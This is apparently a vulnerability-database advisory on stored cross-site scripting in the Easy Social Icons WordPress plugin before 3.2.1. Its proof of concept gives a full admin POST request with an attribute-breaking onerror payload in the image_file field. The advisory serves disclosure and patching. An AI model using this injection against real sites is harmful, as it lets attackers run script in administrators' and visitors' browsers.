WordPress Plugin Vulnerabilities
Easy Social Icons < 3.2.1 - Admin+ Stored Cross-Site Scripting in add icon
Description
The plugin does not properly escape the image_file field when adding a new social icon, allowing high privileged users to inject arbitrary javascript even when the unfiltered_html capability is disallowed. Version 3.2.0 adressed some of the issues, but was still vulnerable when clicking to edit the contaminated icon.
Proof of Concept
POST /wp-admin/admin.php?page=cnss_social_icon_add HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryntci4RWsTIt6kFWd Accept-Encoding: gzip, deflate Cookie: [Admin cookies] Connection: close ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="_wpnonce" 482d64ba75 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/admin.php?page=cnss_social_icon_add ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="title" 55 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="image_file" ." onerror=alert``;// ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="url" 1123 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="sortorder" 4 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="target" 1 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="action" update ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name="submit_button" 변경사항 저장 ------WebKitFormBoundaryntci4RWsTIt6kFWd--
Affects Plugins
Fixed in version 3.2.1
References
Classification
Miscellaneous
Original Researcher
qerogram
Submitter
qerogram
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-03-21 (about 8 months ago)
Added
2022-03-21 (about 8 months ago)
Last Updated
2022-04-11 (about 8 months ago)